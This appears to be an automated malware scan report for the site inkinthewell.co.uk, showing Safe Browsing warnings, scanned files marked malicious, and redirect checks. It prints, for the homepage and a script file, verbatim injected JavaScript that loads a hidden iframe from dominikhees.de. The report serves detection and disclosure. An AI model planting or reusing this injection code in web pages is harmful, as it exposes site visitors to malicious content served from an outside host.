Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inkinthewell.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.inkinthewell.co.uk/ | 200 OK Content-Length: 6749 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var id = '037'; var yrue09 = document.createElement('iframe'); yrue09.src = 'http://dominikhees.de/rel.php'; yrue09.style.position = 'absolute'; yrue09.style.border = '1'; yrue09.style.height = '31px'; yrue09.style.width = '42px'; yrue09.style.left = '500px'; yrue09.style.top = '100px'; if (!document.getElementById('yrue')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'yrue\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('yrue').appendChild(yrue09); }})(); Antivirus reports:
| ||
http://www.inkinthewell.co.uk/wpscripts/jspngfix.js | 200 OK Content-Length: 1501 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var id = '902';
var nyf09 = document.createElement('iframe');
nyf09.src = 'http://dominikhees.de/rel.php';
nyf09.style.position = 'absolute';
nyf09.style.border = '1';
nyf09.style.height = '31px';
nyf09.style.width = '42px';
nyf09.style.left = '500px';
nyf09.style.top = '100px';
if (!document.getElementById('nyf')) {
document.write('<style>body{overflow-x:hidden;}</style>');
document.write('<div id=\'nyf\' style="position:absolute; width:80%; height:100%;" ></div>');
document.getElementById('nyf').appendChild(nyf09);
}
})(); Antivirus reports:
| ||
http://www.inkinthewell.co.uk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inkinthewell.co.uk
Result:
GET / HTTP/1.1
Host: inkinthewell.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: inkinthewell.co.uk
Referer: http://www.google.com/search?q=inkinthewell.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: inkinthewell.co.uk
Referer: http://www.google.com/search?q=inkinthewell.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.